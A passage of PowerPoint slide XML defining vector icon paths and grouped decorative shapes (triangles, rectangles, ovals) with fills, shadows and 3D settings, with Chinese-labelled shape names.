                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:grp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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
